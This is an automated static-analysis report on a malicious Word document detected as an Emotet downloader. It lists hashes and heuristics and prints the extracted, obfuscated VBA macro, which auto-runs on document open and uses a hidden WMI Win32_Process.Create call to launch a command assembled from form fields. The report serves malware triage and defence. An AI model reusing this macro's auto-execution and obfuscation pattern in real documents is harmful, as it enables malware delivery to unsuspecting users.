Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 83fa0162fb532457…

MALICIOUS

Office (OLE)

181.7 KB Created: 2019-12-20 17:07:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 5933e6e71b1d3e766d1d529f9ac15c47 SHA-1: 145b635bf9f6a766333c147273e93ef1560e60ac SHA-256: 83fa0162fb5324572374214ce4d756ff39be9a5996e293a86dfd305e61698dd2
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7473497-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Gkjpnwxihmxy = GetObject(Dcnoxqwznm)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7618 bytes
SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
163 of 306 identifiers look randomly generated (e.g. 'Pyngajvzaswfh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Hcmhzkjwdl = 3 * Fqdsyasenoww
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
      For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
         Bnbajuowvggcm = ("Rerum ad nihil vel.")
         Gingzqsy = 223
      Next
      Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
   Ewdbqeofwfve = 234 + 423
   Do While Ucwjhgwmvyh = 1
      Rdkgxjky = 3 * Hscfaewhrzd
      Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
      For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
         Wrljfjwzrb = ("Velit saepe.")
         Ndffipzh = 223
      Next
      Ulszawfr = Chtalegcvuz
Loop
End Sub

Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
   Ecpsjpwmt = 234 + 423
   Do While Iflpcowzdtqob = 1
      Qlrgusoolmu = 3 * Evuphzdzzkfb
      Mnnnndwy = ("Et.")
      For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
         Jiygysjieomg = ("Enim ut vel.")
         Hhkijhrspcfz = 223
      Next
      Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
   Xoxcfslhh = 234 + 423
   Do While Pkocrnurft = 1
      Kkoupcjxomswo = 3 * Llcoewtryqjb
      Bqljpnrrywfxb = ("Autem.")
      For Sroysigd = Cqtqegapan To Nyfcungih
         Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
         Upfiaghl = 223
      Next
      Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
   Zcyuqbzhudyk = 234 + 423
   Do While Wvxzhtphlfoe = 1
      Ibunrqdbman = 3 * Aoxboyme
      Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
      For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
         Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
         Jkgqadlqc = 223
      Next
      Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
   Lhsyghafslbi = 234 + 423
   Do While Letzvixom = 1
      Xdgyuyaelpj = 3 * Hgrkaaarl
      Gdjeewwuxkid = ("Ea et.")
      For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
         Uphpromjiicnw = ("Magnam.")
         Pgxecxxnq = 223
      Next
      Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
   Yyqtlblmjar = 234 + 423
   Do While Usazcqclwva = 1
      Bvovtqeuu = 3 * Dwiiuaeoe
      Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
      For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
         Plpplkfme = ("Dicta.")
         Pcryihkdhla = 223
      Next
      Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
   Hhahpldlmgytv = 234 + 423
   Do While Bdbvsqpntmg = 1
      Cpsroosgidlmw = 3 * Nxrrvfnk
      Iisthuiee = ("Larry")
      For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
         Ujcwmygukzttl = ("Ronnie")
         Puyciwrsobfm = 223
      Next
      Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Dxztlkebm = 234 + 423
   Do While Ngqkvsvdtavag = 1
      Mvopoxnzbmda = 3 * Vpwvlvkkk
      Xiaghwsmsyin = ("Sint hic officiis vel.")
      For Bagoxrskw = Yfumibldur To Ttpkosinbao
         Evmtdnmdvjry = ("Et.")
         Wwjcpnmnvh = 223
      Next
      Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Aojplemq.Gzuokbkyuug + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
   Bfmckkwihiaz = 234 + 423
   Do While Aekpydhwj = 1
      Qqwjgipnqlgs = 3 * Kwbemzutb
      Kweanfwvktua = ("Et.")
      For Zllzuuml = Ggsxryxovqw To Mdgkwomqwc
         Nithghznru = ("Sed molestiae libero quam recusandae.")
         Yemwfeiena = 223
      Next
      Nkpwwwkdpldqe = Jxztswtlscq
Loop
Dcnoxqwznm = Join(Uqdvmpngkfcs, "")
   Hxaemhxqqzcle = 234 + 423
   Do While Wwlxqtzpxi = 1
      Chldewgncwp = 3 * Kacgyyjy
      Lbiscihdwutvi = ("Ut impedit nemo eos numquam aliquam sapiente non facere et.")
      For Xoxxkzhptftxi = Ipdizbvedf To Tbkprxkajman
         Momjkzell = ("Consectetur illo asperiores sint.")
         Zfubjusqgnnj = 223
      Next
      Zxyawopj = Hsuuvohpgxs
Loop
Set Gkjpnwxihmxy = GetObject(Dcnoxqwznm)
   Wlyhavvsmu = 234 + 423
   Do While Tpysogzamph = 1
      Bwlmexbp = 3 * Rfqcymry
      Hmzudygckwge = ("Celia")
      For Yzkghwob = Hmxeaovrrp To Xqigryfexnr
         Zckrtggu = ("Commodi ea asperiores.")
         Qabbwapmxgi = 223
      Next
      Xafpvnotukab = Zyiqvidsfp
Loop
Rioscijwwxx = Dcnoxqwznm + Jeuwzqvsdrcqz.Lcgurlihjqe.ControlTipText + Jeuwzqvsdrcqz.Kavzasrckkfrp.ControlTipText
   Ihcumvqfu = 234 + 423
   Do While Bjpnoqgqqibbt = 1
      Vikhgitnanug = 3 * Bvaawtxd
      Hditxgfjruz = ("Qui ab illum.")
      For Ngpiwpatkuno = Bwjusowa To Zqthlosd
         Mthkantu = ("Vanessa")
         Vejfemizgs = 223
      Next
      Dpigvsivbj = Ohpytevbeu
Loop
Jhotvpvvro = Rioscijwwxx + Aojplemq.Gzuokbkyuug
   Dhfwqdskkhs = 234 + 423
   Do While Ocwipifcilro = 1
      Suybjheaymlq = 3 * Zavtdfcn
      Keanuwnivlzqm = ("Eum ratione ut iure aut autem ipsa.")
      For Opodjxyze = Pylppfnzr To Qfczduybi
         Kpqojxblfvl = ("Suscipit eligendi hic beatae.")
         Pxgvucmod = 223
      Next
      Ibktdadttznwz = Qyfaletvjgoch
Loop
Set Ewxdqdei = GetObject(Jhotvpvvro)
   Nucgbbkfmrw = 234 + 423
   Do While Zjyflsijyjq = 1
      Lqajsmkphjybu = 3 * Tysbepbxrmh
      Gokmzcpt = ("Autem ut necessitatibus ut possimus veniam ut.")
      For Yjwarzze = Tqarpdikt To Lwkjsymcrvvnv
         Ipjxsiqigqn = ("Naomi")
         Vufawgmmmryam = 223
      Next
      Kxcfwyvtavqnv = Tefqgxqv
Loop
Ewxdqdei.XSize = False
   Xmdofjmztyom = 234 + 423
   Do While Wztomnceaofqu = 1
      Kcwxgtpgyku = 3 * Yjpnjsiw
      Wbqtlpioockjv = ("Qui rerum consequuntur.")
      For Pehtvdstzfr = Gcbsrdzwqzdq To Frrpoxyunbdw
         Hqouqqima = ("Aspernatur.")
         Ssszeecgimci = 223
      Next
      Btmoapuh = Zliayntrzxv
Loop
Ewxdqdei.YSize = False
   Hgdqfewunrxo = 234 + 423
   Do While Pbpubepsghts = 1
      Tgisphoj = 3 * Encalomdw
      Vaypoeoz = ("Autem eos magni.")
      For Nssahjezfggdg = Bpgsvpvbcyf To Aczkbkru
         Efherdwrtibnp = ("Rudy")
         Airrqcbzb = 223
      Next
      Gvbwytrp = Oldxgglacm
Loop
Do While Gkjpnwxihmxy.Create(KSNNSN & Ypzdgmswtvdol, Ssirbkkvy, Ewxdqdei, Xfvqhbpjicvz)
Loop
   Cjevedjkn = 234 + 423
   Do While Ornzcmqtw = 1
      Edsdgulonr = 3 * Kxbxtdzfqylj
      Pbehyigsfbcb = ("Quasi sequi veritatis perspiciatis.")
      For Yyzojwdcapx = Utfsjmofkkfsv To Ravsgkgrzwzu
         Bokjmmzzjt = ("Quae non ipsa distinctio reprehenderit error autem.")
         Joouvoilka = 223
      Next
      Ilnbgvjrz = Vvjjbssrcd
Loop
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.